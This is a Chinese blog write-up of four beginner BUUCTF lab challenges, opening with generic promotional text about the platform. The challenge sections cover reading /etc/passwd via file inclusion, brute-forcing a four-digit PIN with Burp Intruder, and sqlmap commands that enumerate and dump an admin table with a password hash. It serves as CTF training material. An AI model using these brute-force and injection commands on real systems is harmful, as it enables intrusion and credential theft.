BUUCTF：Basic 解析（一）

Linux Labs、BUU LFI COURSE 1、BUU BRUTE 1、BUU SQL COURSE 1

Krving

1684人浏览 · 2024-04-28 12:30:16

Krving · 2024-04-28 12:30:16 发布

前言

Buuctf Web 是一个在线安全挑战平台，旨在提高参与者对网络安全的理解和实践能力。本文将详细介绍 Buuctf Web 的特点、挑战和机遇，帮助读者更好地了解这一领域。

一、Buuctf Web 的特点

多样化的挑战场景：Buuctf Web 提供了多种挑战场景，包括 Web 漏洞利用、密码破解、CTF 夺旗等，涵盖了网络安全领域的各个方面。
高质量的学习资源：平台提供了丰富的学习资源，包括视频教程、文章、案例分析等，帮助参与者提高技能水平。
实时排名和互动交流：Buuctf Web 支持实时排名和互动交流功能，参与者可以在平台上与其他选手一起讨论问题、分享经验。

二、Buuctf Web 的挑战

技术难度高：网络安全领域涉及的知识面广泛，技术难度较高，需要参与者具备较高的技术水平和学习能力。
时间压力大：在 CTF 夺旗等挑战中，时间是非常宝贵的资源，需要在有限的时间内快速定位问题并找到解决方案。
需要团队协作：在某些挑战中，需要团队协作才能更好地完成任务，如何有效地分工和协作也是一大挑战。

三、Buuctf Web 的机遇

提高技能水平：通过参与 Buuctf Web 的挑战，参与者可以不断提高自己的技能水平，增强在网络安全领域的竞争力。
拓展人脉资源：在平台上与其他选手交流互动，可以结识志同道合的朋友，拓展人脉资源。
获得实践机会：Buuctf Web 的挑战场景都是基于真实场景设计的，参与者在挑战中可以获得宝贵的实践机会。
为未来的工作做好准备：对于那些希望在未来从事网络安全相关工作的参与者来说，参与 Buuctf Web 可以为他们未来的工作做好准备。通过参与 Buuctf Web 的挑战，他们可以了解行业最新的动态和技术趋势，提高自己的职业竞争力。

四、如何参与 Buuctf Web 的挑战？

注册账号：首先需要在 Buuctf Web 平台上注册一个账号。
选择挑战场景：根据自己的兴趣和需求选择相应的挑战场景。
学习相关知识：为了更好地完成挑战，需要提前学习相关知识，如 Web 安全、密码学等。
参与挑战：按照挑战的要求完成相应的任务，与其他选手竞争排名。
交流与分享：在平台上与其他选手交流经验、分享技巧，共同提高技术水平。

总结：Buuctf Web 作为一个在线安全挑战平台，为网络安全爱好者提供了一个学习和交流的平台。通过参与 Buuctf Web 的挑战，不仅可以提高自己的技能水平，还可以拓展人脉资源、了解行业动态并为未来的工作做好准备。希望本文的介绍能帮助读者更好地了解 Buuctf Web 的特点、挑战和机遇，为未来的发展做好准备。

一、Linux Labs

打开靶场

F12 源代码啥也没有，但是题目给出了 ssh 连接的用户名密码端口号及主机，推测应该是要连接，打开 XShell 连接

设置用户名及密码

连接成功，随后找到 flag

二、BUU LFI COURSE 1

打开靶场

F12 检查源代码，没发现异常

看标题应该是本地文件包含漏洞，要求构造一个 GET 请求去尝试访问 flag

报错显示了路径，尝试访问 /etc/passwd

尝试访问 flag

三、BUU BRUTE 1

打开靶场

F12 检查源代码没发现异常，输入 admin 密码为 123 提交试试

报错提示密码为四位数字，那么大概率用户名是对的（这里换其他用户名的话会提示用户名错误）

生成字典开始爆破

# 导入模块
import itertools

# 生成密码组合
passwords = [''.join(i) for i in itertools.product('0123456789', repeat=4)]

# 保存到txt文件
with open('passwords.txt', 'w') as file:
    for password in passwords:
        file.write(password + '\n')

使用 BurpSuite 抓包，打开内嵌浏览器

开启拦截，然后将靶场的 URL 复制到内嵌浏览器中访问

成功抓到数据包

右键发送到 Intruder，选择密码参数添加 payload

点击上面的 payload，选择从文件中加载字典，点击开始攻击

若想提升速度可以在资源池中设置线程数

经过等待后点击下长度查看密码正确的数据包（原理是密码错误的数据包长度都是一样的）

将它右键发送到 repeater 模块

点击发送再点击页面渲染即可看到 flag

四、BUU SQL COURSE 1

打开靶场

F12 查看源代码没有发现注释

点击三个热点新闻发现都没有什么用

在调试器中发现了参数 id

猜测存在 SQL 注入，使用 SQLMap 发现 id 参数是可注入的

爆库

sqlmap -u "http://298a91c2-b73f-458a-b2bc-c2efb33b6953.node5.buuoj.cn:81/backend/content_detail.php?id=1" --dbs

[16:32:35] [INFO] retrieved: 'information_schema'
[16:32:35] [INFO] retrieved: 'ctftraining'
[16:32:35] [INFO] retrieved: 'mysql'
[16:32:35] [INFO] retrieved: 'performance_schema'
[16:32:35] [INFO] retrieved: 'test'
[16:32:35] [INFO] retrieved: 'news'

查看咱们当前在哪个数据库

sqlmap -u "http://298a91c2-b73f-458a-b2bc-c2efb33b6953.node5.buuoj.cn:81/backend/content_detail.php?id=1" --current-db 

current database: 'news'

爆出当前所在库的表

sqlmap -u "http://298a91c2-b73f-458a-b2bc-c2efb33b6953.node5.buuoj.cn:81/backend/content_detail.php?id=1" -D news --tables


Database: news                                                                                                              
[2 tables]
+----------+
| admin    |
| contents |
+----------+

爆表 admin

sqlmap -u "http://298a91c2-b73f-458a-b2bc-c2efb33b6953.node5.buuoj.cn:81/backend/content_detail.php?id=1" -D news -T admin --columns

Database: news                                                                                                              
Table: admin
[3 columns]
+----------+--------------+
| Column   | Type         |
+----------+--------------+
| id       | int(11)      |
| password | varchar(128) |
| username | varchar(128) |
+----------+--------------+

爆 id,password,username 数据

sqlmap -u "http://298a91c2-b73f-458a-b2bc-c2efb33b6953.node5.buuoj.cn:81/backend/content_detail.php?id=1" -D news -T admin -C id,password,username --dump

Database: news
Table: admin
[1 entry]
+----+----------------------------------+----------+
| id | password                         | username |
+----+----------------------------------+----------+
| 1  | 1c2f234bcc0ef776e6a73c3ff4ab803f | admin    |
+----+----------------------------------+----------+

直接登录试试